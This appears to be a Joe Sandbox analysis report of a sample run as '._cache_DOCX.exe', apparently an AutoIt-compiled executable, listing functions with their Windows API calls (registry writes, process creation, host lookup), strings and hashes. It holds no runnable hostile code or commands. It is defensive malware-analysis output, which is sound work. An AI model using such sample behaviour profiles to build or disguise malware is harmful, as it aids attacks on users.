__dosmaperr.LIBCMT ref: 006C6CE4
GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 006C6CF7
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 006C6D1A
__dosmaperr.LIBCMT ref: 006C6D23
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 006C6D2C
__set_osfhnd.LIBCMT ref: 006C6D5C
__lseeki64_nolock.LIBCMT ref: 006C6DC6
__close_nolock.LIBCMT ref: 006C6DEC
__chsize_nolock.LIBCMT ref: 006C6E1C
__lseeki64_nolock.LIBCMT ref: 006C6E2E
__lseeki64_nolock.LIBCMT ref: 006C6F26
__lseeki64_nolock.LIBCMT ref: 006C6F3B
__close_nolock.LIBCMT ref: 006C6F9B

Part of subcall function 006BF84C: CloseHandle.KERNEL32(00000000,0073EEC4,00000000,?,006C6DF1,0073EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 006BF89C
Part of subcall function 006BF84C: GetLastError.KERNEL32(?,006C6DF1,0073EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 006BF8A6
Part of subcall function 006BF84C: __free_osfhnd.LIBCMT ref: 006BF8B3
Part of subcall function 006BF84C: __dosmaperr.LIBCMT ref: 006BF8D5

Part of subcall function 006B889E: __getptd_noexit.LIBCMT ref: 006B889E

__lseeki64_nolock.LIBCMT ref: 006C6FBD
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 006C70F2
___createFile.LIBCMT ref: 006C7111
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 006C711E
__dosmaperr.LIBCMT ref: 006C7125
__free_osfhnd.LIBCMT ref: 006C7145
__invoke_watson.LIBCMT ref: 006C7173
__wsopen_helper.LIBCMT ref: 006C718D

Strings

9Ak, xrefs: 006C705E
@, xrefs: 006C6D48

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: 9Ak$@
API String ID: 3896587723-2316146245
Opcode ID: 5fd26daa60830769c90f19660864c310419e4f8a2f1d1ad9515d6980476acb98
Instruction ID: 4cc76ecc24983fe1a1514f08eaf4a4b47b8c9487362d61512af7178876461261
Opcode Fuzzy Hash: 5fd26daa60830769c90f19660864c310419e4f8a2f1d1ad9515d6980476acb98
Instruction Fuzzy Hash: 7822E2B1A042059BEB259E68DC51FFD7B63EB04324F28422DF521E73E2C6358D90CB59

Function 006D76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 006D76ED
GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 006D7713
_wcscpy.LIBCMT ref: 006D7741
_wcscmp.LIBCMT ref: 006D774C
_wcscat.LIBCMT ref: 006D7762
_wcsstr.LIBCMT ref: 006D776D
754B1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 006D7789
_wcscat.LIBCMT ref: 006D77D2
_wcscat.LIBCMT ref: 006D77D9
_wcsncpy.LIBCMT ref: 006D7804

Strings

%u.%u.%u.%u, xrefs: 006D7867
DefaultLangCodepage, xrefs: 006D77EC
04090000, xrefs: 006D77BF
\VarFileInfo\Translation, xrefs: 006D7781
StringFileInfo\, xrefs: 006D775C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$B1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 398981869-1459072770
Opcode ID: 52273c5bdd46a8422a57b219fc7a2247cd5ee4d8cf8acfff8925ae3557f430e4
Instruction ID: 6ed9c09a11fa24b4abfce43cb8a8236227f0b41b1d23e2842b947a92e06790be
Opcode Fuzzy Hash: 52273c5bdd46a8422a57b219fc7a2247cd5ee4d8cf8acfff8925ae3557f430e4
Instruction Fuzzy Hash: BB4127F19042147AE751B7649C57EFF7BAEDF15710F00006AF404E6282FB789A8197BA

Function 00691F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00697E53: _memmove.LIBCMT ref: 00697EB9

GetForegroundWindow.USER32 ref: 00691FBE
IsWindow.USER32(?), ref: 0070282E

Strings

REGEXPCLASS, xrefs: 0070267A
CLASS, xrefs: 00702659
INSTANCE, xrefs: 0070276D
ALL, xrefs: 00702795
LAST, xrefs: 007025E7
ACTIVE, xrefs: 007025FD
TITLE, xrefs: 007027C3
REGEXPTITLE, xrefs: 00702629
HANDLE, xrefs: 00702613

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 7b02d933f24f8a1ced22d73a3bd7de421e7d06eef354a60c90c117bc87e26be5
Instruction ID: fc860defdfedf8a6ed1c3f4e0ddfc682ca7e7bdfc01fb4eec20a490157324a53
Opcode Fuzzy Hash: 7b02d933f24f8a1ced22d73a3bd7de421e7d06eef354a60c90c117bc87e26be5
Instruction Fuzzy Hash: 65D10431104202DBCB44EF10C894AA9BBF6BF54340F148A2DF456975E3DB38E99BCB96

Function 006F352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006F3626
RegCreateKeyExW.KERNEL32(?,?,00000000,0072DBF0,00000000,?,00000000,?,?), ref: 006F3694
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006F36DC
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 006F3765
RegCloseKey.ADVAPI32(?), ref: 006F3A85
RegCloseKey.ADVAPI32(00000000), ref: 006F3A92

Strings

REG_DWORD, xrefs: 006F3956
REG_SZ, xrefs: 006F37A3
REG_EXPAND_SZ, xrefs: 006F3702
REG_BINARY, xrefs: 006F3A20
REG_MULTI_SZ, xrefs: 006F384D
REG_QWORD, xrefs: 006F39D3

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: a10aca84a87a84fa2947750b7044fbc4171c0dec951adea34611840b9b709301
Instruction ID: 510b9fab0f64b25a65c2be14e23d94d77c1edf62bfc624fd24e6d0ab93d0a182
Opcode Fuzzy Hash: a10aca84a87a84fa2947750b7044fbc4171c0dec951adea34611840b9b709301
Instruction Fuzzy Hash: 3802BE752006119FCB54EF28C891E6AB7EAFF89720F04845DF98A9B3A1DB34ED01CB45

Function 006AE975 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006AEA39
__wsplitpath.LIBCMT ref: 006AEA56

Part of subcall function 006B297D: __wsplitpath_helper.LIBCMT ref: 006B29BD

_wcsncat.LIBCMT ref: 006AEA69
__makepath.LIBCMT ref: 006AEA85

Part of subcall function 006B2BFF: __wmakepath_s.LIBCMT ref: 006B2C13

Part of subcall function 006B010A: std::exception::exception.LIBCMT ref: 006B013E
Part of subcall function 006B010A: __CxxThrowException@8.LIBCMT ref: 006B0153

_wcscpy.LIBCMT ref: 006AEABE

Part of subcall function 006AEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,006AEADA,?,?), ref: 006AEB27

_wcscat.LIBCMT ref: 007032FC
_wcscat.LIBCMT ref: 00703334
_wcsncpy.LIBCMT ref: 00703370

Strings

'/m, xrefs: 006AE9FC
Include, xrefs: 006AEA63
"u, xrefs: 006AEAEB
\, xrefs: 00703321

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
String ID: '/m$Include$\$"u
API String ID: 1213536620-994532385
Opcode ID: d6d8dff5d419ed9d7ccd5c013f4d6970ed7ffd6c9c7373bfd44706e4d4ea7d01
Instruction ID: cc9f60d282ad1b2295e1441f580f8515261b40307fe047be06de5edd41700793
Opcode Fuzzy Hash: d6d8dff5d419ed9d7ccd5c013f4d6970ed7ffd6c9c7373bfd44706e4d4ea7d01
Instruction Fuzzy Hash: 09515EB2404340ABC314EF55EC95CD6B7ECFB4A301B80892EF54587262EBB89645CB6A

Function 00694257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_DOCX.exe,00000104,?,00000000,00000001,00000000), ref: 0069428C

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

Part of subcall function 006B1BC7: __wcsicmp_l.LIBCMT ref: 006B1C50

_wcscpy.LIBCMT ref: 006943C0
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_DOCX.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0070214E

Strings

/AutoIt3ExecuteScript, xrefs: 0069438A
C:\Users\user\Desktop\._cache_DOCX.exe, xrefs: 00694283, 00694288, 00694292, 006943BB, 006943D9, 0070213B, 00702192
/AutoIt3OutputDebug, xrefs: 00694360
/ErrorStdOut, xrefs: 0069434B
CMDLINE, xrefs: 006942DA, 006942DF, 0069430D
/AutoIt3ExecuteLine, xrefs: 00694375
CMDLINERAW, xrefs: 006942AD

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_DOCX.exe$CMDLINE$CMDLINERAW
API String ID: 861526374-2911018072
Opcode ID: e03737c28eb6e8ae811457c1b997306f9073eb90d703b4e2901ea70b87bda1b2
Instruction ID: 7f25f98e18a021b9ae3c2216d84b56026f1dcfdb1eaa3714aa350005268783bb
Opcode Fuzzy Hash: e03737c28eb6e8ae811457c1b997306f9073eb90d703b4e2901ea70b87bda1b2
Instruction Fuzzy Hash: F8818072800219AACF55EBE0CD52EEFB7BEEF05751F500019E501B7581EF646A09CBA5

Function 006D78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 006D7909
gethostname.WS2_32(?,00000100), ref: 006D7923
gethostbyname.WS2_32(?), ref: 006D7930
_wcscpy.LIBCMT ref: 006D7958
_memmove.LIBCMT ref: 006D796B
inet_ntoa.WS2_32(?), ref: 006D7976
_strcat.LIBCMT ref: 006D7984
_wcscpy.LIBCMT ref: 006D799B
WSACleanup.WS2_32 ref: 006D79A9
_wcscpy.LIBCMT ref: 006D79B7

Strings

0.0.0.0, xrefs: 006D7952

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 02910daa2922b2806cb5aa465c2ceefd3d66c3f70712693417ce3c3a40908c60
Instruction ID: c8a512718709ce779ce3c43a95eb4c98741fd2a37af0ea78ddd8d2a1a2b95ebd
Opcode Fuzzy Hash: 02910daa2922b2806cb5aa465c2ceefd3d66c3f70712693417ce3c3a40908c60
Instruction Fuzzy Hash: D7113872904115AFCB34AB749C55EDA336DDB01720F00406AF0159A2C0FF74DF818B99

Function 006930A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 006930B0
LoadCursorW.USER32(00000000,00007F00), ref: 006930BF
LoadIconW.USER32(00000063), ref: 006930D5
LoadIconW.USER32(000000A4), ref: 006930E7
LoadIconW.USER32(000000A2), ref: 006930F9

Part of subcall function 0069318A: LoadImageW.USER32(00690000,00000063,00000001,00000010,00000010,00000000), ref: 006931AE

RegisterClassExW.USER32(?), ref: 00693167

Part of subcall function 00692F58: GetSysColorBrush.USER32(0000000F), ref: 00692F8B
Part of subcall function 00692F58: RegisterClassExW.USER32(00000030), ref: 00692FB5
Part of subcall function 00692F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00692FC6
Part of subcall function 00692F58: LoadIconW.USER32(000000A9), ref: 00693009

Strings

#, xrefs: 00693140
0, xrefs: 00693139
AutoIt v3, xrefs: 00693156

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: 6e5784390cc31ae3e294d7351ae52bc4727229a4fa65e461aa1e4e68acd22e68
Instruction ID: 57f1382e77cf23ca93a6e786a5f23851512054c665c900b4d99c72769828e6ed
Opcode Fuzzy Hash: 6e5784390cc31ae3e294d7351ae52bc4727229a4fa65e461aa1e4e68acd22e68
Instruction Fuzzy Hash: E9213370D40318ABCB10DFA9EC45BDDBFF5EB48312F40C16AE618A22E0D7B949408F99

Function 006EB74B Relevance: 15.3, APIs: 10, Instructions: 324
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 006EB777
CoInitialize.OLE32(00000000), ref: 006EB7A4
CoUninitialize.COMBASE ref: 006EB7AE
GetRunningObjectTable.OLE32(00000000,?), ref: 006EB8AE
SetErrorMode.KERNEL32(00000001,00000029), ref: 006EB9DB
CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 006EBA0F
CoGetObject.OLE32(?,00000000,0071D91C,?), ref: 006EBA32
SetErrorMode.KERNEL32(00000000), ref: 006EBA45
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006EBAC5
VariantClear.OLEAUT32(0071D91C), ref: 006EBAD5

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 5a096ff45a52237fb14db4c99c84b38839bab81ad3278fa95a16a14bb7fc9f42
Instruction ID: 390a307ace105170905dccc05347ff1f96ee9738f3e22230990e73425b100977
Opcode Fuzzy Hash: 5a096ff45a52237fb14db4c99c84b38839bab81ad3278fa95a16a14bb7fc9f42
Instruction Fuzzy Hash: 6FC11671604345AFC700DF69C88496BB7EAFF89314F04492DF98A9B251DB71ED06CB52

Function 00692F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00692F8B
RegisterClassExW.USER32(00000030), ref: 00692FB5
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00692FC6
LoadIconW.USER32(000000A9), ref: 00693009

Strings

AutoIt v3 GUI, xrefs: 00692FA7
+, xrefs: 00692F74
0, xrefs: 00692F6D
TaskbarCreated, xrefs: 00692FBB

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: 5fe72ba8171491fa6fbea1f9c4d94e124f97bf7f72b5ac1286fcf9c7b084f46e
Instruction ID: 5042b2a1fe26105eeafd17c918a4064510c5a92a060958595ae916708a947d2e
Opcode Fuzzy Hash: 5fe72ba8171491fa6fbea1f9c4d94e124f97bf7f72b5ac1286fcf9c7b084f46e
Instruction Fuzzy Hash: 6121B4B5900318AFDB20DF98E849BCDBBB4FB08712F50811AF515A62E0D7B85944CF99

Function 006F23C5 Relevance: 13.9, APIs: 9, Instructions: 376
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 006F23E6
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006F2579
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006F259D
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006F25DD
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006F25FF
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006F2760
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006F2792
CloseHandle.KERNEL32(?), ref: 006F27C1
CloseHandle.KERNEL32(?), ref: 006F2838

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: f80c4630f766d89f88b68329ef70b85c202e4b893ac6f66dbccb8b1aca16ccb2
Instruction ID: a3167ab6e2e060025a2108002cb3af73421e87a5ebecca4e29fec61a8f2196d3
Opcode Fuzzy Hash: f80c4630f766d89f88b68329ef70b85c202e4b893ac6f66dbccb8b1aca16ccb2
Instruction Fuzzy Hash: F3D1AE716043069FCB14EF24C8A1AAABBE6BF85320F14845DF9999B3A1DB30DC45CF56

Function 006EC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Not an Object type, xrefs: 006EC916
NULL Pointer assignment, xrefs: 006ECCEE, 006ECCFF

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 22382d070996262d05e803ac60d3c65752902bfb036bb449e7e011e697383620
Instruction ID: 4841055e3106dd7e75f744a2dfa3eef375f576f7a52a187f913a6e177f6b4972
Opcode Fuzzy Hash: 22382d070996262d05e803ac60d3c65752902bfb036bb449e7e011e697383620
Instruction Fuzzy Hash: CCE1CFB1A01359ABCF10DFA9C881AEE77B6AB48724F24806DF905AB381D7709D42CB50

